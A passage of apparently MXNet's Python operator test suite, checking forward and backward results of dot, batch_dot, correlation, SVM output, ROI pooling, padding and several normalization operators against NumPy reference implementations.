grad_grad = [mx.nd.zeros(shape, ctx=dev) for shape in arg_shapes]
exe = stn.bind(dev, args=args, args_grad=grad_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
# check forward
assert_almost_equal(out, args['data'].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
out_grad = mx.nd.ones(out.shape, ctx=dev)
exe.backward([out_grad])
# check backward
assert_almost_equal(out_grad, grad_grad[0].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
def test_stn_valid_sampling():
target_shape = (
28,
28,
)
src_shape = (
42,
42,
)
data = mx.sym.Variable(name="data")
loc = mx.sym.Variable(name="loc")
data_array = np.zeros((
1,
1,
) + src_shape)
# Have an ever so slight rotation.
loc_array = np.array(
[[9.03887e-05, 1.00015, 0.00174931, 1.0003, 0.000311901,
-0.000919065]])
stn = mx.sym.SpatialTransformer(
data=data,
loc=loc,
target_shape=target_shape,
transform_type="affine",
sampler_type="bilinear")
grad_req = {k: 'write' for k in stn.list_arguments()}
grads = {
'data': mx.nd.array(np.zeros_like(data_array)),
'loc': mx.nd.array(np.zeros_like(loc_array))
}
executor = stn.bind(
ctx=default_context(),
args={'data': mx.nd.array(data_array),
'loc': mx.nd.array(loc_array)},
grad_req=grad_req,
args_grad=grads)
executor.forward(is_train=True)
executor.backward(mx.nd.ones((
1,
1,
) + target_shape))
@with_seed()
def test_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
ndims = [2]
if ctx.device_type == 'gpu':
dtypes += ['float16']
ndims += [1]
# Test normal dot.
for ndim in ndims:
for data_type in dtypes:
tol = 1e-2 if data_type == 'float16' else 1e-3
for m in range(1, 5):
for k in range(1, 5):
if ndim == 1 and k != 1:
pass
for n in range(1, 5):
a_shape = (m, k) if ndim == 2 else (m,)
b_shape = (k, n) if ndim == 2 else (n,)
a_npy = np.random.normal(0, 1, (m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((m, k), dtype=data_type)
bgrad_npy = np.empty((k, n), dtype=data_type)
c_npy[:, :] = np.dot(a_npy[:, :], b_npy[:, :])
bgrad_npy[:, :] = np.dot(a_npy[:, :].T, ograd_npy[:, :])
agrad_npy[:, :] = np.dot(ograd_npy[:, :], b_npy[:, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.dot(a, b)
exe = c.simple_bind(ctx=ctx, a=a_npy.shape, b=b_npy.shape)
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy, rtol=tol, atol=tol)
exe.backward(out_grads=[mx.nd.array(ograd_npy, mx.cpu()).astype(data_type)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy, rtol=tol, atol=tol)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy, rtol=tol, atol=tol)
# Test dot with transpose flag using gradient checker.
def dot_sym(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y)
def dot_sym_xT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True)
def dot_sym_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_b=True)
def dot_sym_xT_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True, transpose_b=True)
for data_type in dtypes:
for ashape, bshape in [((3, 4), (4, 5)), ((2, 3, 4), (4, 5, 6))]:
m1_npy = np.random.uniform(-1, 1, ashape)
m1_npy = m1_npy.astype(data_type)
m2_npy = np.random.uniform(-1, 1, bshape)
m2_npy = m2_npy.astype(data_type)
check_numeric_gradient(dot_sym(data_type), [m1_npy, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT(data_type), [m1_npy.T, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_yT(data_type), [m1_npy, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT_yT(data_type), [m1_npy.T, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
@with_seed()
def test_batch_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
if ctx.device_type == 'gpu':
dtypes += ['float16']
for data_type in dtypes:
for batch_size in range(1, 5):
for m in range(1, 5):
for k in range(1, 5):
for n in range(1, 5):
transpose_a = (np.random.rand() > 0.5)
transpose_b = (np.random.rand() > 0.5)
a_npy = np.random.normal(0, 1, (batch_size, m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (batch_size, k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((batch_size, m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (batch_size, m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((batch_size, m, k), dtype=data_type)
bgrad_npy = np.empty((batch_size, k, n), dtype=data_type)
a_init_grad_npy = np.random.normal(size=(batch_size, m, k))
a_init_grad_npy = a_init_grad_npy.astype(data_type)
b_init_grad_npy = np.random.normal(size=(batch_size, k, n))
b_init_grad_npy = b_init_grad_npy.astype(data_type)
for i in range(batch_size):
c_npy[i, :, :] = np.dot(a_npy[i, :, :], b_npy[i, :, :])
bgrad_npy[i, :, :] = np.dot(a_npy[i, :, :].T, ograd_npy[i, :, :])
agrad_npy[i, :, :] = np.dot(ograd_npy[i, :, :], b_npy[i, :, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.batch_dot(a, b, transpose_a=transpose_a, transpose_b=transpose_b)
if transpose_a:
a_npy = np.transpose(a_npy, axes=(0, 2, 1))
agrad_npy = np.transpose(agrad_npy, axes=(0, 2, 1))
a_init_grad_npy = np.transpose(a_init_grad_npy, axes=(0, 2, 1))
if transpose_b:
b_npy = np.transpose(b_npy, axes=(0, 2, 1))
bgrad_npy = np.transpose(bgrad_npy, axes=(0, 2, 1))
b_init_grad_npy = np.transpose(b_init_grad_npy, axes=(0, 2, 1))
exe = c.simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='write')
exe_add = c.simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='add')
exe_add.grad_dict['a'][:] = a_init_grad_npy
exe_add.grad_dict['b'][:] = b_init_grad_npy
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe_add.forward(is_train=True, a=a_npy, b=b_npy)
exe_add.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe_add.grad_dict['a'],
agrad_npy + a_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe_add.grad_dict['b'],
bgrad_npy + b_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
def get_correlation(data1,data2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply):
img1 = mx.sym.Variable('img1')
img2 = mx.sym.Variable('img2')
return mx.sym.Correlation(data1=img1,data2=img2,kernel_size =kernel_size,max_displacement = max_displacement,
stride1 = stride1,stride2 = stride2,pad_size= pad_size,is_multiply = is_multiply)
def correlation_forward(data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp2 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp1[:, :, pad_size:pad_size + data1.shape[2], pad_size:pad_size + data1.shape[3]] = data1[:,:,:,:]
tmp2[:, :, pad_size:pad_size + data2.shape[2], pad_size:pad_size + data2.shape[3]] = data2[:,:,:,:]
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
out[nbatch, top_channel, i, j] += tmp1[nbatch, channel,y1 + h, x1 + w] * tmp2[nbatch, channel, y2 + h,x2 + w]
else:
out[nbatch, top_channel, i, j] += abs(tmp1[nbatch, channel, y1 + h, x1 + w] - tmp2[nbatch, channel, y2 + h, x2 + w])
out /= float(kernel_size**2*data1.shape[1])
return out,tmp1,tmp2
def correlation_backward(out_grad,tmp1,tmp2,data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1_grad = np.zeros(tmp1.shape)
tmp2_grad = np.zeros(tmp2.shape)
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*tmp2[nbatch, channel, y2 + h,x2 + w]
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*tmp1[nbatch, channel, y1 + h,x1 + w]
else:
sgn = 1 if (tmp1[nbatch, channel, y1 + h,x1 + w]>=tmp2[nbatch, channel, y2 + h,x2 + w]) else -1
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*sgn
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*(-sgn)
tmp1_grad = tmp1_grad / float(kernel_size**2*data1.shape[1])
tmp2_grad = tmp2_grad / float(kernel_size**2*data1.shape[1])
return tmp1_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],tmp2_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],
def unittest_correlation(data_shape,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply,dtype):
img1 = np.random.random(data_shape)
img1 = img1.astype(dtype)
img2 = np.random.random(data_shape)
img2 = img2.astype(dtype)
net1 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply)
net2 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply )
exe1 = net1.simple_bind(default_context(),img1=img1.shape,img2=img1.shape)
exe1.arg_dict['img1'][:] = img1
exe1.arg_dict['img2'][:] = img2
#cpu forward
exe1.forward(is_train=True)
# python forward
forward_result,tmp1,tmp2 = correlation_forward(img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# forward error
assert_almost_equal(exe1.outputs[0], forward_result, rtol=1e-4, atol=1e-4)
# out_grad
a = np.ones(forward_result.shape)
out_grad1 = mx.nd.array(a,default_context())
# cpu backward
exe1.backward(out_grads=out_grad1)
# python backward
grad1,grad2 = correlation_backward(a,tmp1,tmp2,img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# backward error
assert_almost_equal(exe1.grad_dict['img1'], grad1, rtol=1e-3, atol=1e-4)
assert_almost_equal(exe1.grad_dict['img2'], grad2, rtol=1e-3, atol=1e-4)
@with_seed()
def test_correlation():
def test_infer_type(dtype):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
corr = mx.sym.Correlation(data1=a, data2=b)
arg_type1, out_type1, _ = corr.infer_type(a=dtype)
if arg_type1[0] != np.dtype(dtype) and arg_type1[1] != np.dtype(dtype) and out_type1[0] != np.dtype(dtype):
msg = npt.npt.build_err_msg([a, b],
err_msg="Inferred type from a is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
arg_type2, out_type2, _ = corr.infer_type(b=dtype)
if arg_type2[0] != np.dtype(dtype) and arg_type2[1] != np.dtype(dtype) and out_type2[0] != np.dtype(dtype):
msg = npt.npt.build_err_msg([a, b],
err_msg="Inferred type from b is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
for dtype in ['float16', 'float32']:
test_infer_type(dtype)
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 1,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 10,stride1 = 1,stride2 = 2,pad_size = 10,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,6,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,11,11), kernel_size = 5,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
@with_seed()
def test_support_vector_machine_l1_svm():
xpu = default_context()
shape = (20, 10)
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SVMOutput(data=X, label=L, use_linear=True)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
l_np = np.random.randint(0, shape[1], (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
assert_almost_equal(x_np, exec1.outputs[0])
exec1.backward()
l_mask = np.equal(l_np.reshape(shape[0],1),range(shape[1]))
l_mask = np.array(l_mask, dtype=np.float32)*2 -1
grad_np = (-1) * l_mask * np.greater(1 - l_mask * x_np, 0)
assert_almost_equal(grad_np, grad)
@with_seed()
def test_support_vector_machine_l2_svm():
xpu = default_context()
shape = (20, 10)
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SVMOutput(data=X, label=L)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
x_np = x_np.astype(np.float32)
l_np = np.random.randint(0, shape[1], (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
assert_almost_equal(x_np, exec1.outputs[0])
exec1.backward()
l_mask = np.equal(l_np.reshape(shape[0],1),range(shape[1]))
l_mask = np.array(l_mask, dtype=np.float32)*2 -1
grad_np = (-2)*l_mask*np.maximum(1-l_mask*x_np,0)
grad_np = grad_np.astype(np.float32)
assert_almost_equal(grad_np, grad)
# Seed set because the test is not robust enough to operate on random data
@with_seed(1234)
def test_roipooling():
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.ROIPooling(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1)
x1 = np.random.rand(4, 3, 12, 8).astype('float32')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2], [1, 3.1, 1.1, 5.2, 10.2], [0, 3, 3, 3, 3]], dtype='float32')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'write', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'add', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1E-4)
def check_pad_with_shape(shape, xpu, pad_width, mode, dtype="float64"):
# bind with label
X = mx.symbol.Variable('X', dtype=dtype)
Y = mx.symbol.Pad(data=X, mode=mode, pad_width=pad_width)
x = mx.random.uniform(-1, 1, shape, ctx=mx.cpu(), dtype=dtype).copyto(xpu)
# numpy result
pad_grouped = list(zip(*[iter(list(pad_width))] * 2))
np_out = np.pad(x.asnumpy(), pad_grouped, mode)
# mxnet result
grad = mx.nd.empty(shape, ctx = xpu, dtype=dtype)
exec1 = Y.bind(xpu, args = [x], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0]
# compare numpy + mxnet
assert_almost_equal(out, np_out)
# grad check
check_numeric_gradient(Y, [x.asnumpy()], numeric_eps=1e-2, rtol=1e-2)
@with_seed()
def test_pad():
ctx = default_context()
shape1 = (2, 3, 3, 5)
pad1 = (0, 0, 0, 0, 1, 2, 3, 4)
shape2 = (2, 3, 3, 5, 4)
pad2 = (0, 0, 0, 0, 1, 2, 3, 4, 3, 1)
# note: this op doesn't support ints yet. Add tests when supported
dtypes = ["float16", "float32", "float64"]
for dtype in dtypes:
check_pad_with_shape(shape1, ctx, pad1, 'constant', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'edge', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'constant', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'edge', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'reflect', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'reflect', dtype)
def np_instance_norm(data, weight, bias, eps):
spatial_dims = data.shape[2::]
num_spatial_vals = np.prod(np.array(spatial_dims))
scale = 1/float(num_spatial_vals)
sum_axis = tuple(range(2, data.ndim))
mean = scale * np.sum(data, axis = sum_axis)
mean = np.reshape(np.repeat(mean, num_spatial_vals), data.shape)
var = scale * np.sum((data - mean)**2, axis = sum_axis)
var = np.reshape(np.repeat(var, num_spatial_vals), data.shape)
weightBatch = np.tile(weight, (data.shape[0], 1))
weightBatch = np.reshape(np.repeat(weightBatch, num_spatial_vals), data.shape)
biasBatch = np.tile(bias, (data.shape[0], 1))
biasBatch = np.reshape(np.repeat(biasBatch, num_spatial_vals), data.shape)
return weightBatch * (data - mean)/np.sqrt(var + eps) + biasBatch
def check_instance_norm_with_shape(shape, xpu):
# bind with label
eps = 0.001
X = mx.symbol.Variable('X')
G = mx.symbol.Variable('G')
B = mx.symbol.Variable('B')
Y = mx.symbol.InstanceNorm(data=X, beta=B, gamma=G, eps=eps)
x = mx.random.normal(0, 1, shape, ctx=mx.cpu()).copyto(xpu)
gamma = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
beta = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
np_out = np_instance_norm(x.asnumpy(), gamma.asnumpy(), beta.asnumpy(), eps)
exec1 = Y.bind(xpu, args = {'X':x, 'G':gamma, 'B':beta})
exec1.forward(is_train=False)
out = exec1.outputs[0]
assert_almost_equal(out, np_out, rtol=1e-4, atol=1e-4)
check_numeric_gradient(Y, {'X':x.asnumpy(), 'G':gamma.asnumpy(), 'B':beta.asnumpy()},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
@with_seed()
def test_instance_normalization():
check_instance_norm_with_shape((1, 1, 1), default_context())
check_instance_norm_with_shape((2, 1, 2), default_context())
check_instance_norm_with_shape((2,4,5,6), default_context())
check_instance_norm_with_shape((3,3,2,3,2,1,1), default_context())
def check_l2_normalization(in_shape, mode, dtype, norm_eps=1e-10):
ctx = default_context()
data = mx.symbol.Variable('data')
out = mx.symbol.L2Normalization(data=data, mode=mode, eps=norm_eps)
in_data = np.random.uniform(-1, 1, in_shape).astype(dtype)
# calculate numpy results
if mode == 'channel':
assert in_data.ndim > 2
np_norm = np.linalg.norm(in_data, axis=1) + norm_eps
np_norm = np.repeat(1. / np.expand_dims(np_norm, axis=1), in_data.shape[1], axis=1)
np_out = np.multiply(in_data, np_norm)
elif mode == 'spatial':
assert in_data.ndim > 2
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], s[1], -1)), axis=2) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size / s[0] / s[1], axis=2)
np_out = np.multiply(in_data, np_norm.reshape(s))
elif mode == 'instance':
assert in_data.ndim > 1
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], -1)), axis=1) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size / s[0], axis=1)
np_out = np.multiply(in_data, np_norm.reshape(s))
else:
raise RuntimeError('Unknown l2 normalization mode')
exe = out.simple_bind(ctx=ctx, data=in_data.shape)
output = exe.forward(is_train=True, data=in_data)
# compare numpy + mxnet
assert_almost_equal(exe.outputs[0], np_out, rtol=1e-2 if dtype is 'float16' else 1e-5, atol=1e-5)
# check gradient
check_numeric_gradient(out, [in_data], numeric_eps=1e-3, rtol=1e-2, atol=5e-3)
@with_seed()
def test_l2_normalization():
for dtype in ['float16', 'float32', 'float64']:
for mode in ['channel', 'spatial', 'instance']:
nbatch = random.randint(1, 4)
nchannel = random.randint(3, 5)
height = random.randint(4, 6)
check_l2_normalization((nbatch, nchannel, height), mode, dtype)
width = random.randint(5, 7)
check_l2_normalization((nbatch, nchannel, height, width), mode, dtype)
def check_layer_normalization(in_shape, axis, eps, dtype=np.float32,
forward_check_eps=1E-3, backward_check_eps=1E-3,
npy_grad_check=True, finite_grad_check=True):
def npy_layer_norm(data, gamma, beta, axis=1, eps=1E-5):
if axis < 0:
axis += data.ndim
broadcast_shape = [1 for _ in range(data.ndim)]
broadcast_shape[axis] = data.shape[axis]
mean = data.mean(axis=axis, keepdims=True).astype(dtype)
var = data.var(axis=axis, keepdims=True).astype(dtype)
std = np.sqrt(var + dtype(eps)).astype(dtype)
out = np.reshape(gamma, broadcast_shape) * (data - mean) / std + \
np.reshape(beta, broadcast_shape)
return out
def npy_layer_norm_grad(data, gamma, out_grad, axis, eps):
if axis < 0:
axis += data.ndim
exclude_axis = tuple([ele for ele in range(data.ndim) if ele != axis])
data_mean = data.mean(axis=axis, keepdims=True)
data_var = data.var(axis=axis, keepdims=True)
data_std = np.sqrt(data_var + eps)
centered_data = (data - data_mean) / data_std
gamma_grad = (centered_data * out_grad).sum(axis=exclude_axis, keepdims=True)
beta_grad = out_grad.sum(axis=exclude_axis, keepdims=True)
w = out_grad * gamma.reshape([1 if i != axis else data.shape[axis] for i in range(data.ndim)])\
/ data_std
data_grad = w - w.mean(axis=axis, keepdims=True)\
- centered_data * (w * centered_data).mean(axis=axis, keepdims=True)
gamma_grad = gamma_grad.reshape((-1,))
beta_grad = beta_grad.reshape((-1,))
return data_grad, gamma_grad, beta_grad
ctx = default_context()
data = np.random.normal(0, 1, in_shape).astype(dtype)
gamma = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
beta = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
data_s = mx.symbol.Variable('data')
gamma_s = mx.symbol.Variable('gamma')
beta_s = mx.symbol.Variable('beta')
out_s = mx.symbol.LayerNorm(data=data_s, gamma=gamma_s, beta=beta_s, axis=axis, eps=eps)
exe = out_s.simple_bind(ctx, data=in_shape)
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
out_nd = exe.forward()[0]
out = npy_layer_norm(data, gamma, beta, axis, eps)
assert_almost_equal(out, out_nd, forward_check_eps, forward_check_eps)
if finite_grad_check:
for req in ['write', 'add']:
check_numeric_gradient(out_s, {'data': data, 'gamma': gamma, 'beta': beta},
grad_nodes={'data': req, 'gamma': req, 'beta': req},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
if npy_grad_check:
# Test for grad_req = write
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
exe = out_s.simple_bind(ctx, data=in_shape, grad_req='write')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad =\
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(), gt_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(), gt_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(), gt_beta_grad, backward_check_eps, backward_check_eps)
# Test for grad_req = add
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_data_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_gamma_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
init_beta_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
exe = out_s.simple_bind(ctx, data=in_shape, grad_req='add')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.grad_dict['data'][:] = init_data_grad
exe.grad_dict['gamma'][:] = init_gamma_grad
exe.grad_dict['beta'][:] = init_beta_grad
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad = \
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(),
gt_data_grad + init_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(),
gt_gamma_grad + init_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(),
gt_beta_grad + init_beta_grad, backward_check_eps, backward_check_eps)
@with_seed()
def test_norm():
try:
import scipy
assert LooseVersion(scipy.__version__) >= LooseVersion('0.1')
from scipy.linalg import norm as sp_norm
except (AssertionError, ImportError):
print("Could not import scipy.linalg.norm or scipy is too old. "
"Falling back to numpy.linalg.norm which is not numerically stable.")
from numpy.linalg import norm as sp_norm
def l1norm(input_data, axis=0, keepdims=True):
return np.sum(abs(input_data), axis=axis, keepdims=keepdims)
def l2norm(input_data, axis=0, keepdims=True):
return sp_norm(input_data, axis=axis, keepdims=keepdims)
ctx = default_context()
data = mx.symbol.Variable('data')
in_data_dim = random_sample([2,3,4], 1)[0]
in_shape = rand_shape_nd(in_data_dim, dim=5)
epsilon = 1e-3
acc_type = {np.float16: np.float32, np.float32: np.float32, np.float64: np.float64,
np.int32: np.int32, np.int64: np.int64}
dtype_to_str = {np.float16: 'float16', np.float32: 'float32', np.float64: 'float64',
np.int32: 'int32', np.int64: 'int64'}
is_windows = sys.platform.startswith('win')
for enforce_safe_acc in ["1", "0"]:
if is_windows:
if enforce_safe_acc == "0":
break
enforce_safe_acc = "0" if "MXNET_SAFE_ACCUMULATION" not in os.environ else os.environ["MXNET_SAFE_ACCUMULATION"]
